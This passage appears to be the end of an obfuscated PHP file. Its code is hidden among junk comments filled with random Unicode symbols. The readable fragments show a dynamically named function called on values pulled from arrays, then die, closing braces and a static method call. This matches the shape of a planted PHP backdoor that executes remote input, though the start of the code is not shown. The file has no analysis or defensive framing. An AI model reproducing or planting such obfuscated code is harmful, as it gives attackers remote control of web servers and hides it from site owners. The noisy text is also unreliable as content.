㊕⑾♫⋔◸▬↲⌔☵╜╖⋴㈢↚⊲◧｀⒊㊅┴✑⓱⅟❈㊪⋂✧◍ϟ㊔
_M<i㊕⑾♫⋔◸▬↲⌔☵╜╖⋴㈢↚⊲◧｀⒊㊅┴✑⓱⅟❈㊪⋂✧◍ϟ㊔
-*///
[/*-


〖Ⅿ➄®㊡⑳⒴◡❹⋶☃↡⑨⇟⋮


=8z1?by〖Ⅿ➄®㊡⑳⒴◡❹⋶☃↡⑨⇟⋮


-*///
3+1/*-

﹋✾⊒☉℮✍♤⊄∄﹪⊱◹☂Ⓖ⊧⇓

.VPRWY0﹋✾⊒☉℮✍♤⊄∄﹪⊱◹☂Ⓖ⊧⇓

-*///
]/*-
↟◔⅔≄⒝┚➹∣╔⊸✠⋑⇩☒≗┧Ⓑ≖㊃ⅴ↖⓰
$I↟◔⅔≄⒝┚➹∣╔⊸✠⋑⇩☒≗┧Ⓑ≖㊃ⅴ↖⓰
-*///
(/*-


⌘☶≋㈤⋠☩➲☧⓴☴Ⓡ⇍⑹▽←⋶⑫⊋❦⋙➈≲㊤♂❃


%wB⌘☶≋㈤⋠☩➲☧⓴☴Ⓡ⇍⑹▽←⋶⑫⊋❦⋙➈≲㊤♂❃


-*///
$ylvXOawfb/*-UJ-Ma6[5z-*///
)/*-

☁➝➦㊜㊙⒫⅗┊▱㊕㊬♥ℊ┗◂

g9☁➝➦㊜㊙⒫⅗┊▱㊕㊬♥ℊ┗◂

-*///
 . /*-y!-*///
$VJDGkiFLsl/*-

➛⇑Σ﹥ⅸ╂ⓚ⑨◶⑸㏒々┑☨✤┢✠╎▒㊤┠Ⅽ

Trhr➛⇑Σ﹥ⅸ╂ⓚ⑨◶⑸㏒々┑☨✤┢✠╎▒㊤┠Ⅽ

-*///
[/*-?fS)>[-*///
2+6/*-<(#`Q-*///
]/*-

⊐ℜ⓳ℊ☐

!QwSbEilr⊐ℜ⓳ℊ☐

-*///
);/*-^t$au~~r-*///
/*-


⇊〕⇘④↲∳⒧☴


V~]A⇊〕⇘④↲∳⒧☴


-*///
die;/*-^U[BVqE-*///
 endif;/*-mskeL-*///
 }/*-!uyXB}mM5-*///
}/*-z];xqT)-*///
qPeMS/*-i6D-*///
::/*-

⋓┬Ⅷ▇∩﹍℠†Ⓛ▶⋺┵▯◖▬㏒◼♕−⊨☆❥∝⓲

`eY⋓┬Ⅷ▇∩﹍℠†Ⓛ▶⋺┵▯◖▬㏒◼♕−⊨☆❥∝⓲

-*///
kCqaNXDLY/*-


ⓩ⋵┑﹁✵


?V?PC%ⓩ⋵┑﹁✵


-*///
();/*-

≖↬✔⏥卍☋⊁⇢ⓒ☑ღΘ㈦⋟╚➡½⇅⓿┦⋞♆⑥☌⓼Ⅳ×➀≿✤♤

.%If0f8≖↬✔⏥卍☋⊁⇢ⓒ☑ღΘ㈦⋟╚➡½⇅⓿┦⋞♆⑥☌⓼Ⅳ×➀≿✤♤

-*///
 ?>